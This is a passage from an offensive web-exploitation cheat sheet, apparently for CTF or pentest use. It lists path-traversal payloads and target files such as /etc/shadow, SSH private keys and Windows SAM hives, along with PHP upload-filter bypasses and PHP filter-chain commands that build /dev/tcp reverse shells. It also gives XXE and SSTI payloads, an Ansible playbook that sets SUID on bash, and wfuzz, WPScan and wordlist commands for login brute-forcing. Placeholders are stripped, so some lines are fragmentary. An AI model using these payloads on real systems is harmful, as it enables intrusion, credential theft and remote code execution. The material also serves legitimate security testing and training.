Accept: ../../../../.././../../../../etc/passwd{%0D
Accept: ../../../../.././../../../../etc/passwd{%0A
Accept: ../../../../.././../../../../etc/passwd{%00
Accept: ../../../../.././../../../../etc/passwd{%0D{{
Accept: ../../../../.././../../../../etc/passwd{%0A{{
Accept: ../../../../.././../../../../etc/passwd{%00{{
```

##### Linux files

```
/app/etc/local.xml
/etc/passwd
/etc/shadow
/etc/aliases
/etc/anacrontab
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/etc/apache2/sites-enabled/000-default.conf
/etc/at.allow
/etc/at.deny
/etc/bashrc
/etc/bootptab
/etc/chrootUsers
/etc/chttp.conf
/etc/cron.allow
/etc/cron.deny
/etc/crontab
/etc/cups/cupsd.conf
/etc/exports
/etc/fstab
/etc/ftpaccess
/etc/ftpchroot
/etc/ftphosts
/etc/groups
/etc/grub.conf
/etc/hosts
/etc/hosts.allow
/etc/hosts.deny
/etc/httpd/access.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/httpd.conf
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/etc/httpd/php.ini
/etc/httpd/srm.conf
/etc/inetd.conf
/etc/inittab
/etc/issue
/etc/knockd.conf
/etc/lighttpd.conf
/etc/lilo.conf
/etc/logrotate.d/ftp
/etc/logrotate.d/proftpd
/etc/logrotate.d/vsftpd.log
/etc/lsb-release
/etc/motd
/etc/modules.conf
/etc/mtab
/etc/my.cnf
/etc/my.conf
/etc/mysql/my.cnf
/etc/network/interfaces
/etc/networks
/etc/npasswd
/etc/php4.4/fcgi/php.ini
/etc/php4/apache2/php.ini
/etc/php4/apache/php.ini
/etc/php4/cgi/php.ini
/etc/php5/apache2/php.ini
/etc/php5/apache/php.ini
/etc/php/apache2/php.ini
/etc/php/apache/php.ini
/etc/php/cgi/php.ini
/etc/php.ini
/etc/php/php4/php.ini
/etc/php/php.ini
/etc/printcap
/etc/profile
/etc/proftp.conf
/etc/proftpd/proftpd.conf
/etc/pure-ftpd.conf
/etc/pureftpd.passwd
/etc/pureftpd.pdb
/etc/pure-ftpd/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pure-ftpd/putreftpd.pdb
/etc/redhat-release
/etc/resolv.conf
/etc/samba/smb.conf
/etc/snmpd.conf
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/etc/ssh/ssh_host_dsa_key
/etc/ssh/ssh_host_dsa_key.pub
/etc/ssh/ssh_host_key
/etc/ssh/ssh_host_key.pub
/etc/sysconfig/network
/etc/syslog.conf
/etc/termcap
/etc/vhcs2/proftpd/proftpd.conf
/etc/vsftpd.chroot_list
/etc/vsftpd.conf
/etc/vsftpd/vsftpd.conf
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftpusers
/logs/pure-ftpd.log
/logs/security_debug_log
/logs/security_log
/opt/lampp/etc/httpd.conf
/opt/xampp/etc/php.ini
/proc/cmdline
/proc/cpuinfo
/proc/filesystems
/proc/interrupts
/proc/ioports
/proc/meminfo
/proc/modules
/proc/mounts
/proc/net/arp
/proc/net/tcp
/proc/net/udp
/proc//cmdline
/proc//maps
/proc/sched_debug
/proc/self/cwd/app.py
/proc/self/environ
/proc/self/net/arp
/proc/stat
/proc/swaps
/proc/version
/root/anaconda-ks.cfg
/usr/etc/pure-ftpd.conf
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/local/apache/conf/modsec.conf
/usr/local/apache/conf/php.ini
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/usr/local/apache/audit_log
/usr/local/apache/error_log
/usr/local/apache/error.log
/usr/local/cpanel/logs
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/etc/php.ini
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pureftpd.pdb
/usr/local/lib/php.ini
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf.php
/usr/local/php4/lib/php.ini
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf.php
/usr/local/php5/lib/php.ini
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf.ini
/usr/local/php/lib/php.ini
/usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pureftpd.pdn
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/www/logs/httpd_log
/usr/local/Zend/etc/php.ini
/usr/sbin/pure-config.pl
/var/adm/log/xferlog
/var/apache2/config.inc
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/cpanel/cpanel.config
/var/lib/mysql/my.cnf
/var/lib/mysql/mysql/user.MYD
/var/local/www/conf/php.ini
/var/log/apache2/access_log
/var/log/apache2/access.log
/var/log/apache2/error_log
/var/log/apache2/error.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache-ssl/access.log
/var/log/apache-ssl/error.log
/var/log/auth.log
/var/log/boot
/var/htmp
/var/log/chttp.log
/var/log/cups/error.log
/var/log/daemon.log
/var/log/debug
/var/log/dmesg
/var/log/dpkg.log
/var/log/exim_mainlog
/var/log/exim/mainlog
/var/log/exim_paniclog
/var/log/exim.paniclog
/var/log/exim_rejectlog
/var/log/exim/rejectlog
/var/log/faillog
/var/log/ftplog
/var/log/ftp-proxy
/var/log/ftp-proxy/ftp-proxy.log
/var/log/httpd-access.log
/var/log/httpd/access_log
/var/log/httpd/access.log
/var/log/httpd/error_log
/var/log/httpd/error.log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/kern.log
/var/log/lastlog
/var/log/lighttpd/access.log
/var/log/lighttpd/error.log
/var/log/lighttpd/lighttpd.access.log
/var/log/lighttpd/lighttpd.error.log
/var/log/mail.info
/var/log/mail.log
/var/log/maillog
/var/log/mail.warn
/var/log/message
/var/log/messages
/var/log/mysqlderror.log
/var/log/mysql.log
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql-slow.log
/var/log/proftpd
/var/log/pureftpd.log
/var/log/pure-ftpd/pure-ftpd.log
/var/log/secure
/var/log/vsftpd.log
/var/log/wtmp
/var/log/xferlog
/var/log/yum.log
/var/mysql.log
/var/run/utmp
/var/spool/cron/crontabs/root
/var/webmin/miniserv.log
/var/www/html/__init__.py
/var/www/html/db_connect.php
/var/www/html/utils.php
/var/www/log/access_log
/var/www/log/error_log
/var/www/logs/access_log
/var/www/logs/error_log
/var/www/logs/access.log
/var/www/logs/error.log
~/.atfp_history
~/.bash_history
~/.bash_logout
~/.bash_profile
~/.bashrc
~/.gtkrc
~/.login
~/.logout
~/.mysql_history
~/.nano_history
~/.php_history
~/.profile
~/.ssh/authorized_keys
~/.ssh/id_dsa
~/.ssh/id_dsa.pub
~/.ssh/id_rsa
~/.ssh/id_rsa.pub
~/.ssh/identity
~/.ssh/identity.pub
~/.viminfo
~/.wm_style
~/.Xdefaults
~/.xinitrc
~/.Xresources
~/.xsession
```

##### Windows files

```
C:/Users/Administrator/NTUser.dat
C:/Documents and Settings/Administrator/NTUser.dat
C:/apache/logs/access.log
C:/apache/logs/error.log
C:/apache/php/php.ini
C:/boot.ini
C:/inetpub/wwwroot/global.asa
C:/MySQL/data/hostname.err
C:/MySQL/data/mysql.err
C:/MySQL/data/mysql.log
C:/MySQL/my.cnf
C:/MySQL/my.ini
C:/php4/php.ini
C:/php5/php.ini
C:/php/php.ini
C:/Program Files/Apache Group/Apache2/conf/httpd.conf
C:/Program Files/Apache Group/Apache/conf/httpd.conf
C:/Program Files/Apache Group/Apache/logs/access.log
C:/Program Files/Apache Group/Apache/logs/error.log
C:/Program Files/FileZilla Server/FileZilla Server.xml
C:/Program Files/MySQL/data/hostname.err
C:/Program Files/MySQL/data/mysql-bin.log
C:/Program Files/MySQL/data/mysql.err
C:/Program Files/MySQL/data/mysql.log
C:/Program Files/MySQL/my.ini
C:/Program Files/MySQL/my.cnf
C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log
C:/Program Files/MySQL/MySQL Server 5.0/my.cnf
C:/Program Files/MySQL/MySQL Server 5.0/my.ini
C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf
C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf
C:/Program Files (x86)/Apache Group/Apache/conf/access.log
C:/Program Files (x86)/Apache Group/Apache/conf/error.log
C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml
C:/Program Files (x86)/xampp/apache/conf/httpd.conf
C:/WINDOWS/php.ini
C:/WINDOWS/Repair/SAM
C:/Windows/repair/system
C:/Windows/repair/software
C:/Windows/repair/security
C:/WINDOWS/System32/drivers/etc/hosts
C:/Windows/win.ini
C:/WINNT/php.ini
C:/WINNT/win.ini
C:/xampp/apache/bin/php.ini
C:/xampp/apache/logs/access.log
C:/xampp/apache/logs/error.log
C:/Windows/Panther/Unattend/Unattended.xml
C:/Windows/Panther/Unattended.xml
C:/Windows/debug/NetSetup.log
C:/Windows/system32/config/AppEvent.Evt
C:/Windows/system32/config/SecEvent.Evt
C:/Windows/system32/config/default.sav
C:/Windows/system32/config/security.sav
C:/Windows/system32/config/software.sav
C:/Windows/system32/config/system.sav
C:/Windows/system32/config/regback/default
C:/Windows/system32/config/regback/sam
C:/Windows/system32/config/regback/security
C:/Windows/system32/config/regback/system
C:/Windows/system32/config/regback/software
C:/Program Files/MySQL/MySQL Server 5.1/my.ini
C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml
C:/Windows/System32/inetsrv/config/applicationHost.config
C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log
```

#### PDF PHP Inclusion

Create a file that starts with a PDF header and contains PHP code; a magic-byte check sees a PDF, while the include still evaluates the PHP.

```
%PDF-1.4
```

```
http:///index.php?page=uploads/.pdf%00&cmd=whoami
```

#### PHP Upload Filter Bypasses

```
.sh
.cgi
.inc
.txt
.pht
.phtml
.phP
.Php
.php3
.php4
.php5
.php7
.phps
.phar
.phpt
.pgif
.phtm
.php%00.jpeg
```

```
.php%20
.php%0d%0a.jpg
.php%0a
.php.jpg
.php%00.gif
.php\x00.gif
.php%00.png
.php\x00.png
.php%00.jpg
.php\x00.jpg
mv .jpg .php\x00.jpg
```

#### PHP Filter Chain Generator

```
python3 php_filter_chain_generator.py --chain ''
python3 php_filter_chain_generator.py --chain ''
python3 php_filter_chain_generator.py --chain '& /dev/tcp// 0>&1"); ?>'
python3 php_filter_chain_generator.py --chain '& /dev/tcp// 0>&1"); ?>'
python3 php_filter_chain_generator.py --chain "& /dev/tcp// 0>&1\"'); ?>"
python3 php_filter_chain_generator.py --chain "& /dev/tcp// 0>&1\"'); ?>"
```

```
http:///?page=php://filter/convert.base64-decode/resource=PD9waHAgZWNobyBzaGVsbF9leGVjKGlkKTsgPz4
```

```
python3 php_filter_chain_generator.py --chain ''
[+] The following gadget chain will generate the following code : (base64 value: PD89IGV4ZWMoJF9HRVRbMF0pOyA/Pg)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|<--- SNIP --->|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp&0=
```

```
python3 php_filter_chain_generator.py --chain "& /dev/tcp// 0>&1\"'); ?>" | grep "^php" > 
```

```
curl "http:///index.php?file=$(cat )"
```

#### PHP Generic Gadget Chains (PHPGGC)

```
phpggc -u --fast-destruct Guzzle/FW1 /dev/shm/.txt /PATH/TO/FILE/.txt
```

#### Server-Side Request Forgery (SSRF)

```
https:///item/2?server=server./file?id=9&x=
```

#### Server-Side Template Injection (SSTI)

##### Fuzz string

```
${{<%[%'"}}%\.
```

##### Magic payload

```
{{ ''.__class__.__mro__[1].__subclasses__() }}
```

#### Upload Vulnerabilities

```
ASP / ASPX / PHP / PHP3 / PHP5: Webshell / Remote Code Execution
SVG: Stored XSS / Server-Side Request Forgery
GIF: Stored XSS
CSV: CSV Injection
XML: XXE
AVI: Local File Inclusion / Server-Side Request Forgery
HTML/JS: HTML Injection / XSS / Open Redirect
PNG / JPEG: Pixel Flood Attack
ZIP: Remote Code Execution via Local File Inclusion
PDF / PPTX: Server-Side Request Forgery / Blind XXE
```

#### wfuzz

```
wfuzz -w /usr/share/wfuzz/wordlist/general/big.txt -u http:///FUZZ/.php --hc '403,404'
```

##### Write to file

```
wfuzz -w /PATH/TO/WORDLIST -c -f  -u http:// --hc 403,404
```

##### Custom scan with limited output

```
wfuzz -w /PATH/TO/WORDLIST -u http:///dev/304c0c90fbc6520610abbf378e2339d1/db/file_FUZZ.txt --sc 200 -t 20
```

##### Fuzzing two parameters at once

```
wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://://FUZZ.FUZ2Z -z list,txt-php --hc 403,404 -c
```

##### Domains

```
wfuzz --hh 0 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.' -u http:///
```

##### Subdomains

```
wfuzz -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ." --hc 200 --hw 356 -t 100 
```

##### Git

```
wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -u http:///FUZZ --hc 403,404
```

##### Login

```
wfuzz -X POST -u "http://:/login.php" -d "email=FUZZ&password=" -w /PATH/TO/WORDLIST/ --hc 200 -c
wfuzz -X POST -u "http://:/login.php" -d "username=FUZZ&password=" -w /PATH/TO/WORDLIST/ --ss "Invalid login"
```

##### SQL

```
wfuzz -c -z file,/usr/share/wordlists/seclists/Fuzzing/SQLi/Generic-SQLi.txt -d 'db=FUZZ' --hl 16 http:///select http
```

##### DNS

```
wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Origin: http://FUZZ." --filter "r.headers.response~'Access-Control-Allow-Origin'" http:///
wfuzz -c -w /usr/share/wordlists/secLists/Discovery/DNS/subdomains-top1million-110000.txt --hc 400,404,403 -H "Host: FUZZ." -u http:// -t 100
wfuzz -c -w /usr/share/wordlists/secLists/Discovery/DNS/subdomains-top1million-110000.txt --hc 400,403,404 -H "Host: FUZZ." -u http:// --hw  -t 100
```

##### Numbered files

```
wfuzz -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt --hw 31 http://10.13.37.11/backups/backup_2021052315FUZZ.zip
```

##### Enumerate PIDs

```
wfuzz -u 'http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/FUZZ/cmdline' -z range,900-1000
```

#### WPScan

```
wpscan --url https:// --enumerate u,t,p
wpscan --url https:// --plugins-detection aggressive
wpscan --url https:// --disable-tls-checks
wpscan --url https:// --disable-tls-checks --enumerate u,t,p
wpscan --url http:// -U  -P passwords.txt -t 50
```

#### XML External Entity (XXE)

##### Skeleton payload request

```
GET / HTTP/1.1
Host: :
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Length: 136

:80/shell.php" >]>
&xxe;
```

##### Payloads

```
]>
&passwd;1
```

```
]>3&test;
17th Estate, CA
```

```
username=%26username%3b&version=1.0.0-->+]>
```

#### Malicious YAML

An Ansible playbook that, when run by a privileged user, sets the SUID bit on bash.

```
- hosts: localhost
  tasks:
  - name: badyml
    command: chmod +s /bin/bash
```

### Wordlists

#### Bash

##### Append numbers to a password stem

```
for i in {1..100}; do printf "Password@%d\n" $i >> ; done
```

#### CeWL

```
cewl -d 0 -m 5 -w  http:///index.php --lowercase
cewl -d 5 -m 3 -w  http:///index.php --with-numbers
```

#### CUPP

```
./cupp -i
```

#### crunch

```
crunch 9 9 -t foobar%%% > wordlist.txt
crunch 5 5 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ -o .txt
```

#### JavaScript quick wordlist

Collects every word on the current page, deduplicated and sorted, one per line.

```
javascript:(function(){const e=document.documentElement.innerText.match(/[a-zA-Z_\-]+/g),n=[...new Set(e)].sort();document.open(),document.write(n.join("\n")),document.close();})();
```

#### Mutating wordlists

##### Find empty passwords

```
grep -n '^$' /PATH/TO/WORDLIST/
```

##### Remove entries starting with a digit

`sed '/^1/d'` only removes lines beginning with `1`; use `^[0-9]` to drop every line that starts with a digit.

```
head /PATH/TO/WORDLIST/ > .txt
sed -i '/^[0-9]/d' .txt
```

#### Username Anarchy

```
./username-anarchy -f first,first.last,last,flast,f.last -i 
```